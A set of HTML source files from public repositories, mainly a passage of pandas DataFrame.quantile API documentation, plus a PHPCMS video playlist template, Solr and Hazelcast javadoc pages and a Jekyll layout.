<li class="toctree-l2"><a class="reference internal" href="../api.html#multiindex">MultiIndex</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#datetimeindex">DatetimeIndex</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#timedeltaindex">TimedeltaIndex</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#periodindex">PeriodIndex</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#scalars">Scalars</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#frequencies">Frequencies</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#window">Window</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#groupby">GroupBy</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#resampling">Resampling</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#style">Style</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#id43">Plotting</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#general-utility-functions">General utility functions</a></li> <li class="toctree-l2"><a class="reference internal" href="../api.html#extensions">Extensions</a></li> </ul> </li> <li class="toctree-l1"><a class="reference internal" href="../developer.html">Developer</a></li> <li class="toctree-l1"><a class="reference internal" href="../internals.html">Internals</a></li> <li class="toctree-l1"><a class="reference internal" href="../extending.html">Extending Pandas</a></li> <li class="toctree-l1"><a class="reference internal" href="../release.html">Release Notes</a></li> </ul> <h3 style="margin-top: 1.5em;">Search</h3> <form class="search" action="../search.html" method="get"> <input type="text" name="q" size="18"/> <input type="submit" value="Go"/> <input type="hidden" name="check_keywords" value="yes"/> <input type="hidden" name="area" value="default"/> </form> <p class="searchtip" style="font-size: 90%"> Enter search terms or a module, class or function name. </p> </div> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body"> <div class="section" id="pandas-dataframe-quantile"> <h1>pandas.DataFrame.quantile<a class="headerlink" href="#pandas-dataframe-quantile" title="Permalink to this headline">¶</a></h1> <dl class="method"> <dt id="pandas.DataFrame.quantile"> <code class="descclassname">DataFrame.</code><code class="descname">quantile</code><span class="sig-paren">(</span><em>q=0.5</em>, <em>axis=0</em>, <em>numeric_only=True</em>, <em>interpolation='linear'</em><span class="sig-paren">)</span><a class="reference external" href="http://github.com/pandas-dev/pandas/blob/master/pandas/core/frame.py#L7083-L7175"><span class="viewcode-link">[source]</span></a><a class="headerlink" href="#pandas.DataFrame.quantile" title="Permalink to this definition">¶</a></dt> <dd><p>Return values at the given quantile over requested axis, a la numpy.percentile.</p> <table class="docutils field-list" frame="void" rules="none"> <col class="field-name" /> <col class="field-body" /> <tbody valign="top"> <tr class="field-odd field"><th class="field-name">Parameters:</th><td class="field-body"><p class="first"><strong>q</strong> : float or array-like, default 0.5 (50% quantile)</p> <blockquote> <div><p>0 &lt;= q &lt;= 1, the quantile(s) to compute</p> </div></blockquote> <p><strong>axis</strong> : {0, 1, ‘index’, ‘columns’} (default 0)</p> <blockquote> <div><p>0 or ‘index’ for row-wise, 1 or ‘columns’ for column-wise</p> </div></blockquote> <p><strong>numeric_only</strong> : boolean, default True</p> <blockquote> <div><p>If False, the quantile of datetime and timedelta data will be computed as well</p> </div></blockquote> <p><strong>interpolation</strong> : {‘linear’, ‘lower’, ‘higher’, ‘midpoint’, ‘nearest’}</p> <blockquote> <div><div class="versionadded"> <p><span class="versionmodified">New in version 0.18.0.</span></p> </div> <p>This optional parameter specifies the interpolation method to use, when the desired quantile lies between two data points <cite>i</cite> and <cite>j</cite>:</p> <ul class="simple"> <li>linear: <cite>i + (j - i) * fraction</cite>, where <cite>fraction</cite> is the fractional part of the index surrounded by <cite>i</cite> and <cite>j</cite>.</li> <li>lower: <cite>i</cite>.</li> <li>higher: <cite>j</cite>.</li> <li>nearest: <cite>i</cite> or <cite>j</cite> whichever is nearest.</li> <li>midpoint: (<cite>i</cite> + <cite>j</cite>) / 2.</li> </ul> </div></blockquote> </td> </tr> <tr class="field-even field"><th class="field-name">Returns:</th><td class="field-body"><p class="first"><strong>quantiles</strong> : Series or DataFrame</p> <blockquote class="last"> <div><ul class="simple"> <li>If <code class="docutils literal notranslate"><span class="pre">q</span></code> is an array, a DataFrame will be returned where the index is <code class="docutils literal notranslate"><span class="pre">q</span></code>, the columns are the columns of self, and the values are the quantiles.</li> <li>If <code class="docutils literal notranslate"><span class="pre">q</span></code> is a float, a Series will be returned where the index is the columns of self and the values are the quantiles.</li> </ul> </div></blockquote> </td> </tr> </tbody> </table> <div class="admonition seealso"> <p class="first admonition-title">See also</p> <p class="last"><a class="reference internal" href="pandas.core.window.Rolling.quantile.html#pandas.core.window.Rolling.quantile" title="pandas.core.window.Rolling.quantile"><code class="xref py py-obj docutils literal notranslate"><span class="pre">pandas.core.window.Rolling.quantile</span></code></a></p> </div> <p class="rubric">Examples</p> <div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="gp">&gt;&gt;&gt; </span><span class="n">df</span> <span class="o">=</span> <span class="n">pd</span><span class="o">.</span><span class="n">DataFrame</span><span class="p">(</span><span class="n">np</span><span class="o">.</span><span class="n">array</span><span class="p">([[</span><span class="mi">1</span><span class="p">,</span> <span class="mi">1</span><span class="p">],</span> <span class="p">[</span><span class="mi">2</span><span class="p">,</span> <span class="mi">10</span><span class="p">],</span> <span class="p">[</span><span class="mi">3</span><span class="p">,</span> <span class="mi">100</span><span class="p">],</span> <span class="p">[</span><span class="mi">4</span><span class="p">,</span> <span class="mi">100</span><span class="p">]]),</span> <span class="go"> columns=[&#39;a&#39;, &#39;b&#39;])</span> <span class="gp">&gt;&gt;&gt; </span><span class="n">df</span><span class="o">.</span><span class="n">quantile</span><span class="p">(</span><span class="o">.</span><span class="mi">1</span><span class="p">)</span> <span class="go">a 1.3</span> <span class="go">b 3.7</span> <span class="go">dtype: float64</span> <span class="gp">&gt;&gt;&gt; </span><span class="n">df</span><span class="o">.</span><span class="n">quantile</span><span class="p">([</span><span class="o">.</span><span class="mi">1</span><span class="p">,</span> <span class="o">.</span><span class="mi">5</span><span class="p">])</span> <span class="go"> a b</span> <span class="go">0.1 1.3 3.7</span> <span class="go">0.5 2.5 55.0</span> </pre></div> </div> <p>Specifying <cite>numeric_only=False</cite> will also compute the quantile of datetime and timedelta data.</p> <div class="highlight-default notranslate"><div class="highlight"><pre><span></span><span class="gp">&gt;&gt;&gt; </span><span class="n">df</span> <span class="o">=</span> <span class="n">pd</span><span class="o">.</span><span class="n">DataFrame</span><span class="p">({</span><span class="s1">&#39;A&#39;</span><span class="p">:</span> <span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">],</span> <span class="go"> &#39;B&#39;: [pd.Timestamp(&#39;2010&#39;),</span> <span class="go"> pd.Timestamp(&#39;2011&#39;)],</span> <span class="go"> &#39;C&#39;: [pd.Timedelta(&#39;1 days&#39;),</span> <span class="go"> pd.Timedelta(&#39;2 days&#39;)]})</span> <span class="gp">&gt;&gt;&gt; </span><span class="n">df</span><span class="o">.</span><span class="n">quantile</span><span class="p">(</span><span class="mf">0.5</span><span class="p">,</span> <span class="n">numeric_only</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span> <span class="go">A 1.5</span> <span class="go">B 2010-07-02 12:00:00</span> <span class="go">C 1 days 12:00:00</span> <span class="go">Name: 0.5, dtype: object</span> </pre></div> </div> </dd></dl> </div> </div> </div> </div> <div class="clearer"></div> </div> </div> </div> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" title="General Index" >index</a></li> <li class="right" > <a href="../py-modindex.html" title="Python Module Index" >modules</a> |</li> <li class="right" > <a href="pandas.DataFrame.query.html" title="pandas.DataFrame.query" >next</a> |</li> <li class="right" > <a href="pandas.DataFrame.product.html" title="pandas.DataFrame.product" >previous</a> |</li> <li class="nav-item nav-item-0"><a href="../index.html">pandas 0.24.0.dev0+81.g8d5032a8c.dirty documentation</a> &#187;</li> <li class="nav-item nav-item-1"><a href="../api.html" >API Reference</a> &#187;</li> <li class="nav-item nav-item-2"><a href="pandas.DataFrame.html" >pandas.DataFrame</a> &#187;</li> </ul> </div> <style type="text/css"> .scrollToTop { text-align: center; font-weight: bold; position: fixed; bottom: 60px; right: 40px; display: none; } </style> <a href="#" class="scrollToTop">Scroll To Top</a> <script type="text/javascript"> $(document).ready(function() { //Check to see if the window is top if not then display button $(window).scroll(function() { if ($(this).scrollTop() > 200) { $('.scrollToTop').fadeIn(); } else { $('.scrollToTop').fadeOut(); } }); //Click event to scroll to top $('.scrollToTop').click(function() { $('html, body').animate({ scrollTop: 0 }, 500); return false; }); }); </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-27880019-2']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> </body> </html>
datapythonista/datapythonista.github.io
docs/new-pandas-doc/generated/pandas.DataFrame.quantile.html
HTML
apache-2.0
25,510
{template "content","header"} {php $video_cache = getcache('video', 'video');} <link href="{CSS_PATH}vms/vms.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="{JS_PATH}cookie.js"></script> <div class="clr ct show_pg"> <div class="crumbs"><a href="{APP_PATH}">首页</a> <span id="play_title"> > 我的播放列表 > {$title}</span></div> <div class="ad"> <a href="http://www.phpcms.cn" title="随机广告位,欢迎访问PHPCMS.CN"><img src="http://www.phpcms.cn/statics/images/video/ad960x40.gif"></a> </div> <div class="lty1"> <div class="clr"> <div class="zj"><h5>{$title}</h5></div> <div class="clr xxg"> <div class="clr">总播放:<span id="hits"></span> <span>|</span> 更新时间:{$inputtime}</div> </div> </div> <div class="plbox clr"> {if $video_info[vid]!=""} {player_code('video_player',$video_info['channelid'],$video_info['vid'],600,500)} {else} 非常抱歉,该视频不存在,或者尚没有通过审核! {/if} </div> <div class="sr"> <ul class="srli"> <li> <strong>分享视频:</strong><a href="#" title="text" class=""></a> <div class="clr sr_tag wp"> <!-- Baidu Button BEGIN --> <div id="bdshare" class="bdshare_b" style="line-height: 12px;"><img src="http://share.baidu.com/static/images/type-button-5.jpg" /> <a class="shareCount"></a> </div> <script type="text/javascript" id="bdshare_js" data="type=button&amp;uid=6434581" ></script> <script type="text/javascript" id="bdshell_js"></script> <script type="text/javascript"> document.getElementById("bdshell_js").src = "http://share.baidu.com/static/js/shell_v2.js?cdnversion=" + new Date().getHours(); </script> <!-- Baidu Button END --> </div> </li> <li> <strong>嵌入代码:</strong> <input name="html" id="html" type="text" size="50" class="fz_ipt" style="margin-left:2px;" ><input type="button" class="fz_btn" value="复制" onclick="copy_text(html);"> </li> </ul> </div> <div class="clr bfj"> {if $video[data]} {loop $video[data] $v} <a href="{$v[url]}" >{$v[title]}</a> {/loop} {/if} </div> <div class="bk10"></div> {if $allow_comment && module_exists('comment')} <iframe src="{APP_PATH}index.php?m=comment&c=index&a=init&commentid={id_encode("content_$catid",$id,$siteid)}&iframe=1" width="100%" height="100%" id="comment_iframe" frameborder="0" scrolling="no"></iframe> <div class="box"> <h5>评论排行</h5> {pc:comment action="bang" siteid="$siteid" cache="3600"} <ul class="content list blue f14 row-2"> {loop $data $r} <li>·<a href="{$r[url]}" target="_blank">{str_cut($r[title], 40)}</a><span>({$r[total]})</span></li> {/loop} </ul> {/pc} </div> {/if} </div> <div class="wp lty2"> <div class="box0"> <div class="nav"> <span class="more" onclick="delcookie('player_list');alert('已经清空播放列表!');javascript:window.location.href='{APP_PATH}';"><label for="lb">清空播放列表</label></span> <h5>上升最快的视频</h5> </div> <div class="bct"> <div class="lbbox"> <ul class="c1 c2" id="select_video"> </ul> </div> </div> </div> <div class="ad"> <a href="http://www.phpcms.cn" title="随机广告位,欢迎访问PHPCMS.CN"><img src="http://www.phpcms.cn/statics/images/video/ad318x64.gif"></a> </div> <div class="box0"> <div class="nav"><h5>精彩推荐</h5></div> <div class="bct"> <ul class="c1 c2"> {pc:content action="position" posid="18" catid="$catid" order="listorder DESC" num="6" return="info"} {loop $info $v} <li> <div class="clr h77"> <a href="{$v[url]}" target="_blank" title="{$v[title]}"><img src="{$v[thumb]}" width="104" height="65" class="l"></a> <div class="lh21"><a href="{$v[url]}" title="{$v[title]}" target="_blank">{str_cut($v[title],22,false)}</a></div> <div class="sz"><span class="shows">播放次数:{get_views('c-'.$CATEGORYS[$v[catid]][modelid].'-'.$v['id'])}</span><span>评论:{get_comments(id_encode("content_$v[catid]",$v[id],$siteid))}</span></div> </div> </li> {/loop} {/pc} </ul> </div> </div> </div> <div class="hr"></div> </div> <script language="JavaScript" src="{APP_PATH}api.php?op=count&id={$contentid}&modelid={$CATEGORYS[$catid][modelid]}"></script> <script language="JavaScript"> <!-- $(function(){ var ck = getcookie('player_list'); show_playerlist(); $('#html').val('<embed src="{player_code('video_player',$video_info['channelid'],$video_info['vid'],600,500)}" quality="high" width="600" height="500" align="middle" allowScriptAccess="always" allowfullscreen="true" flashvars="auto=1" type="application/x-shockwave-flash"></embed>'); return false; }) //设置COOKIE function set_cookie(id,title){ setcookie('now',id); } //切换地址 playReady, playFinish. function playReady() { } function playFinish(id,vid) { var player_list = getcookie('player_list'); var now = getcookie('now'); if(player_list!=null){ var list_array=new Array(); var player=new Array(); list_array = player_list.split("|"); if(now==null){ alert('now 是空的');exit; setcookie('now','0'); player=list_array[0].split("@");//url@标题@vid document.getElementById('video_player').playVideoByVid(player[2]); }else{ var new_now = parseInt(now)+1; if(typeof(list_array[new_now])=="undefined"){ setcookie('now','0'); alert('播完了'); return false; } setcookie('now',new_now); window.open($('#url'+new_now).attr("href"),'_self'); //return false; } } } // 数组循环 function show_playerlist() { var player_list = getcookie('player_list'); var now = getcookie('now'); var content = ""; if(player_list!=null){ var list_array=new Array(); var player=new Array(); list_array = player_list.split("|"); for(var i=0;i<list_array.length;i++) {//调条记录循环 player=list_array[i].split("@"); if('{$contentid}'==player[2]){ var ac = 'ac'; }else { var ac = ''; } content +=("<li class='"+ac+"' id='playid"+i+"'><a href='"+player[0]+"' onclick='set_cookie("+i+");' id='url"+i+"' title='"+player[1]+"'>"+player[1].substring(0,24)+"</a></li>"); } }else{ content = "<li>没有播放列表</li>"; } $('#select_video').html(content); } //--> </script> {template "content","footer"}
johnshen/phpcms
phpcms/templates/default/content/show_videolist.html
HTML
apache-2.0
7,041
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_75) on Wed Jun 10 23:20:35 IST 2015 --> <meta http-equiv="Content-Type" content="text/html" charset="utf-8"> <title>Uses of Class org.apache.solr.handler.component.ResponseBuilder.GlobalCollectionStat (Solr 5.2.1 API)</title> <meta name="date" content="2015-06-10"> <link rel="stylesheet" type="text/css" href="../../../../../../stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.apache.solr.handler.component.ResponseBuilder.GlobalCollectionStat (Solr 5.2.1 API)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../org/apache/solr/handler/component/ResponseBuilder.GlobalCollectionStat.html" title="class in org.apache.solr.handler.component">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../index.html?org/apache/solr/handler/component/class-use/ResponseBuilder.GlobalCollectionStat.html" target="_top">Frames</a></li> <li><a href="ResponseBuilder.GlobalCollectionStat.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h2 title="Uses of Class org.apache.solr.handler.component.ResponseBuilder.GlobalCollectionStat" class="title">Uses of Class<br>org.apache.solr.handler.component.ResponseBuilder.GlobalCollectionStat</h2> </div> <div class="classUseContainer"> <ul class="blockList"> <li class="blockList"> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing packages, and an explanation"> <caption><span>Packages that use <a href="../../../../../../org/apache/solr/handler/component/ResponseBuilder.GlobalCollectionStat.html" title="class in org.apache.solr.handler.component">ResponseBuilder.GlobalCollectionStat</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Package</th> <th class="colLast" scope="col">Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><a href="#org.apache.solr.handler.component">org.apache.solr.handler.component</a></td> <td class="colLast"> <div class="block"><a href="../../../../../../org/apache/solr/handler/component/SearchComponent.html" title="class in org.apache.solr.handler.component"><code>SearchComponent</code></a> implementations for use in <a href="../../../../../../org/apache/solr/handler/component/SearchHandler.html" title="class in org.apache.solr.handler.component"><code>SearchHandler</code></a></div> </td> </tr> </tbody> </table> </li> <li class="blockList"> <ul class="blockList"> <li class="blockList"><a name="org.apache.solr.handler.component"> <!-- --> </a> <h3>Uses of <a href="../../../../../../org/apache/solr/handler/component/ResponseBuilder.GlobalCollectionStat.html" title="class in org.apache.solr.handler.component">ResponseBuilder.GlobalCollectionStat</a> in <a href="../../../../../../org/apache/solr/handler/component/package-summary.html">org.apache.solr.handler.component</a></h3> <table border="0" cellpadding="3" cellspacing="0" summary="Use table, listing fields, and an explanation"> <caption><span>Fields in <a href="../../../../../../org/apache/solr/handler/component/package-summary.html">org.apache.solr.handler.component</a> declared as <a href="../../../../../../org/apache/solr/handler/component/ResponseBuilder.GlobalCollectionStat.html" title="class in org.apache.solr.handler.component">ResponseBuilder.GlobalCollectionStat</a></span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Field and Description</th> </tr> <tbody> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/solr/handler/component/ResponseBuilder.GlobalCollectionStat.html" title="class in org.apache.solr.handler.component">ResponseBuilder.GlobalCollectionStat</a></code></td> <td class="colLast"><span class="strong">ResponseBuilder.</span><code><strong><a href="../../../../../../org/apache/solr/handler/component/ResponseBuilder.html#globalCollectionStat">globalCollectionStat</a></strong></code>&nbsp;</td> </tr> </tbody> </table> </li> </ul> </li> </ul> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../overview-summary.html">Overview</a></li> <li><a href="../package-summary.html">Package</a></li> <li><a href="../../../../../../org/apache/solr/handler/component/ResponseBuilder.GlobalCollectionStat.html" title="class in org.apache.solr.handler.component">Class</a></li> <li class="navBarCell1Rev">Use</li> <li><a href="../package-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../../../../index.html?org/apache/solr/handler/component/class-use/ResponseBuilder.GlobalCollectionStat.html" target="_top">Frames</a></li> <li><a href="ResponseBuilder.GlobalCollectionStat.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small> <i>Copyright &copy; 2000-2015 Apache Software Foundation. All Rights Reserved.</i> <script src='../../../../../../prettify.js' type='text/javascript'></script> <script type='text/javascript'> (function(){ var oldonload = window.onload; if (typeof oldonload != 'function') { window.onload = prettyPrint; } else { window.onload = function() { oldonload(); prettyPrint(); } } })(); </script> </small></p> </body> </html>
priyankajayaswal1/Solr-5.2-1-searching-and-indexing-
docs/solr-core/org/apache/solr/handler/component/class-use/ResponseBuilder.GlobalCollectionStat.html
HTML
apache-2.0
8,028
<!DOCTYPE html> <html lang="en"> {% include head.html %} <body id="page-top"> {% include nav.html %} {% include header.html %} {% include features.html %} {% include contact.html %} {% include scripts.html %} </body> </html>
clingonline/clingonline.github.io
_layouts/front.html
HTML
apache-2.0
238
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_45) on Thu Mar 26 16:48:34 UTC 2015 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> com.hazelcast.cluster.client (Hazelcast Root 3.4.2 API) </TITLE> <META NAME="date" CONTENT="2015-03-26"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style"> </HEAD> <BODY BGCOLOR="white"> <FONT size="+1" CLASS="FrameTitleFont"> <A HREF="../../../../com/hazelcast/cluster/client/package-summary.html" target="classFrame">com.hazelcast.cluster.client</A></FONT> <TABLE BORDER="0" WIDTH="100%" SUMMARY=""> <TR> <TD NOWRAP><FONT size="+1" CLASS="FrameHeadingFont"> Classes</FONT>&nbsp; <FONT CLASS="FrameItemFont"> <BR> <A HREF="AddMembershipListenerRequest.html" title="class in com.hazelcast.cluster.client" target="classFrame">AddMembershipListenerRequest</A> <BR> <A HREF="ClientMembershipEvent.html" title="class in com.hazelcast.cluster.client" target="classFrame">ClientMembershipEvent</A> <BR> <A HREF="ClientPingRequest.html" title="class in com.hazelcast.cluster.client" target="classFrame">ClientPingRequest</A> <BR> <A HREF="MemberAttributeChange.html" title="class in com.hazelcast.cluster.client" target="classFrame">MemberAttributeChange</A></FONT></TD> </TR> </TABLE> </BODY> </HTML>
akiskip/KoDeMat-Collaboration-Platform-Application
KoDeMat_TouchScreen/lib/hazelcast-3.4.2/hazelcast-3.4.2/docs/javadoc/com/hazelcast/cluster/client/package-frame.html
HTML
apache-2.0
1,427